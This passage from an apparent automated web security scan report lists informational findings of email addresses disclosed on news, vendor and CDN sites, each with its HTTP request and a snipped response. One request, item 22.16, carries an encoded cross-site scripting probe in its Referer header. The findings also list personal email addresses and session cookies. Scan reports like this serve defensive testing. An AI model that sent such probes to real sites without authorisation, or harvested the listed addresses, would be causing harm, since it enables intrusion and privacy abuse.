22.12. http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/06/palantir-valued-at-2-5-billion-or-more/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /2011/05/06/palantir-valued-at-2-5-billion-or-more/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/venture-capital/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=13F58691AD21ECE4F6EA06AF2C1F2664&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.17.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199667235:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.6.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f3=0:1|s*192f7=0:1|s*18a4b=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 59715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.13. http://dealbook.nytimes.com/2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/venture-capital/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=13F58691AD21ECE4F6EA06AF2C1F2664&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.17.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199667235:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.6.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f3=0:1|s*192f7=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 61010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://g
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.14. http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/09/private-equity-has-a-horse-in-this-race/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /2011/05/09/private-equity-has-a-horse-in-this-race/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 63016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://g
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.15. http://dealbook.nytimes.com/2011/05/10/apollo-to-buy-out-american-idol-owner/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/10/apollo-to-buy-out-american-idol-owner/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /2011/05/10/apollo-to-buy-out-american-idol-owner/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=gi367p67ehp7835r; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:2|s*1780a=0:1|s*2554b=0:1; nyt-m=3104B7CA0E858F5EE4588722866DC651&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.13.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200208493:ss=1305198204263; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.8.10.1305198192; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:36:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 62595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.16. http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=ABBCA6EE6FB956FC70EF4BEBA92D8B48&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.15.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199607199:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.4.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 59123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://g
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.17. http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/category/main-topics/mergers-acquisitions/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /category/main-topics/mergers-acquisitions/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.2.10.1305198192; _chartbeat2=gi367p67ehp7835r; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.18. http://dealbook.nytimes.com/category/main-topics/private-equity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/category/main-topics/private-equity/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /category/main-topics/private-equity/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.6.10.1305198192; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; _chartbeat2=gi367p67ehp7835r; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200199902:ss=1305198204263

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:36:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 79475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.19. http://dealbook.nytimes.com/category/main-topics/venture-capital/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/category/main-topics/venture-capital/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /category/main-topics/venture-capital/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=FADD01C96E4F27CAA76E2D598CDA52BE&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.16.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199637269:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.4.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f7=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.20. http://digiware.com/contact.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digiware.com
Path:	/contact.htm

Issue detail

The following email address was disclosed in the response:

sales@digiware.com

Request

GET /contact.htm HTTP/1.1
Host: digiware.com
Proxy-Connection: keep-alive
Referer: http://digiware.com/privacy.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:00:47 GMT
Server: Apache/2.0.52 (Unix) PHP/5.2.9 DAV/2
Last-Modified: Sat, 11 Dec 2004 20:01:11 GMT
ETag: "17d1e-10ba-88634fc0"
Accept-Ranges: bytes
Content-Length: 4282
Content-Type: text/html; charset=ISO-8859-1

<html>

<head>
<title>Contact Us</title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<style type="text/css">
<!--
.roll { font-family:Arial; font-size:10pt; font-style:normal; f
...[SNIP]...
<a class="rol" href="mailto:sales@digiware.com">sales@digiware.com</a>
...[SNIP]...

22.21. http://digiware.com/privacy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digiware.com
Path:	/privacy.htm

Issue detail

The following email addresses were disclosed in the response:

info@diginet.net
sales@dignet.net

Request

GET /privacy.htm HTTP/1.1
Host: digiware.com
Proxy-Connection: keep-alive
Referer: http://digiware.com/products.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:00:43 GMT
Server: Apache/2.0.52 (Unix) PHP/5.2.9 DAV/2
Last-Modified: Sat, 11 Dec 2004 20:01:39 GMT
ETag: "17d2c-16d3-8a0e8ec0"
Accept-Ranges: bytes
Content-Length: 5843
Content-Type: text/html; charset=ISO-8859-1

<html>

<head>
<title>Privacy Policy</title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<style type="text/css">
<!--
.roll { font-family:Arial; font-size:10pt; font-style:norma
...[SNIP]...
<a href="mailto:info@diginet.net" <mailto:href>sales@dignet.net <mailto:info@diginet.net>
...[SNIP]...

22.22. http://honey.digiware.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://honey.digiware.net
Path:	/

Issue detail

The following email address was disclosed in the response:

danaeabiga@danaeabigail.com

Request

GET / HTTP/1.1
Host: honey.digiware.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 14:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://honey.digiware.net/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</strong> Danae Abigail Lizana Gonzales [mailto:danaeabiga@danaeabigail.com]<br />
...[SNIP]...

22.23. http://labs.csscorp.com/site/js/cform_popup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://labs.csscorp.com
Path:	/site/js/cform_popup.js

Issue detail

The following email address was disclosed in the response:

yensamg@gmail.com

Request

GET /site/js/cform_popup.js HTTP/1.1
Host: labs.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://labs.csscorp.com/site/
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1; wp1090=UTCTDDDDDDTVYCAU

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:12:12 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 13:25:34 GMT
ETag: "3cb5dd-7a4-4a1fa7df5cf80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 1956

.../***************************/
//@Author: Adrian "yEnS" Mato Gondelle
//@website: www.yensdesign.com
//@email: yensamg@gmail.com
//@license: Feel free to use it, but keep this credits please!
/***************************/

//SETTING UP OUR POPUP
//0 means disabled; 1 means enabled;
var popupStatus = 0;

//loading p
...[SNIP]...

22.24. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/338b/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.gstatic.com
Path:	/cat_js/intl/en_us/mapfiles/338b/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js

Issue detail

The following email address was disclosed in the response:

pat@gmail.com

Request

GET /cat_js/intl/en_us/mapfiles/338b/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js HTTP/1.1
Host: maps.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
